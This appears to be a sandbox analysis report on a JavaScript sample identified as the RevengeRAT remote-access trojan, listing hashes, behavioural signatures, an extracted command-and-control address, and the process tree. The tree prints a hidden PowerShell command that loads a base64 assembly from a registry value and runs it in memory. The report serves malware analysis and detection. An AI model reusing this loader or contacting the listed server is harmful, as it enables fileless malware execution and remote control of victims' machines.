Analysis
-
max time kernel
94s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 04:05
Static task
static1
Behavioral task
behavioral1
Sample
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js
Resource
win10v2004-20241007-en
General
-
Target
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js
-
Size
116KB
-
MD5
0c3e47c0fb0d5a289fded25fd9746817
-
SHA1
2117b82b1724a2f146ffd015b50ce45c63d7fb87
-
SHA256
2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d
-
SHA512
bf8b2895fa9cf32c651d67ff68c3156dfd2f32e4fc9308ec5a190eaf942816feae1357086b150442c4359619356cf6cf3bd4e9bcf8d866b52c51b0c3978133ad
-
SSDEEP
1536:D12+GPp0PG/6Rn/T5d1XtQpm7GOzYCtFA:p2+GB0PG/sn/T5dt+IdG
Malware Config
Extracted
revengerat
NyanCatRevenge
38.51.135.44:333
9822cb7521c94057
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 13 4624 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4624 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4624 powershell.exe 4624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4624 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3136 wrote to memory of 4624 3136 wscript.exe 84 PID 3136 wrote to memory of 4624 3136 wscript.exe 84
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82